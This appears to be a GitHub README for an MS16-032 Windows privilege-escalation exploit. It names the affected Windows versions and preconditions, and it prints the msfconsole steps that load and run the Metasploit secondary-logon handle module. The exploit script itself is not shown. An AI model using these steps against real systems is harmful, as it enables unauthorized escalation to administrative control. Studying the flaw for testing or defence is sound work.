Skip to content

Latest commit

 

History

History
38 lines (26 loc) · 1.26 KB

README.md

File metadata and controls

38 lines (26 loc) · 1.26 KB

MS16-032

Vulnerability reference:

Targets

  • Windows x86
  • Windows x64

Usage of MS16-032.ps1

x86

x64

Windows 10

Win10


Use on msf

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

 msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
        ...targets...
 msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
 msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
        ...show and set options...
 msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit